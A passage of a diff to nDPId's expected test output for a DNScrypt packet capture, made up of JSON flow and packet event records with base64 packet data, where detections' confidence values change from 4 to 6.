AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":412,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58104,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":412,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58104,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":413,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739337184} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":413,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739337184,"pkt":"REREREREZmZmZmZmCABFAABQw6sAub0Rx\/oKAAABBb2qxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":40748,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":946739337184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739337184,"pkt":"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"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":40748,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":40748,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":415,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58650,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":946739337184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739337184,"pkt":"REREREREZmZmZmZmCABFAAXcw60gAL0RoyUKAAABBb2qxOUaAdEGBCTIsoABAAABAAAAAAABATINZG5zY3J5cHQtY2VydARuczE2AmRlA2RucwdvcGVubmljBGdsdWUAABAAAQAAAAAAAAAAAAW3AAwFswAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58650,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58650,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":416,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":59749,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":946739337184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739337184,"pkt":"REREREREZmZmZmZmCABFAAXcw64gAL0RoyQKAAABBb2qxOllAdEGBCB7soIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydARuczE2AmRlA2RucwdvcGVubmljBGdsdWUAABAAAQAAAAAAAAAAAAW3AAwFswAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":416,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":59749,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":416,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739337184,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":59749,"dst_port":465,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":417,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739337184} 
00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":417,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739337184,"pkt":"REREREREZmZmZmZmCABFAABQw60Aub0Rx\/gKAAABBb2qxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":418,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739337184} 
@@ -850,26 +850,26 @@ 00722{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":2,"flow_last_seen":946739337218,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"thread_ts_msec":946739337218,"pkt":"ZmZmZmZmRERERERECABFAADfmrpAADkRNRYFvarECgAAAQHRnywAy9B0soGAAAABAAEAAAAAATINZG5zY3J5cHQtY2VydARuczE2AmRlA2RucwdvcGVubmljBGdsdWUAABAAAcAMABAAAQAADhAAfXxETlNDAAEAAECBm+\/xTzDeD4KSjeZIgKwk3d3hDoaJSO\/h1pwRZePAj9XQLJ\/4Aa45W8vDBSKrJViJIaMolD7iTZBWDGXuFATTYhzIUZpFJ+MsooNEpkdNSme+M97PW3cWzIMHmxZ+fdNiHMhRmkUnX1O28V9TqKVfU9NN"} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38709,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":946739348756,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739348756,"pkt":"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"} 
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38709,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38709,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":426,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":44469,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":946739348756,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAAXcwiUgAL0RAO8KAAABuf2aQq21EPcGBC1ZY0YBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxiY24tZG5zY3J5cHQAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
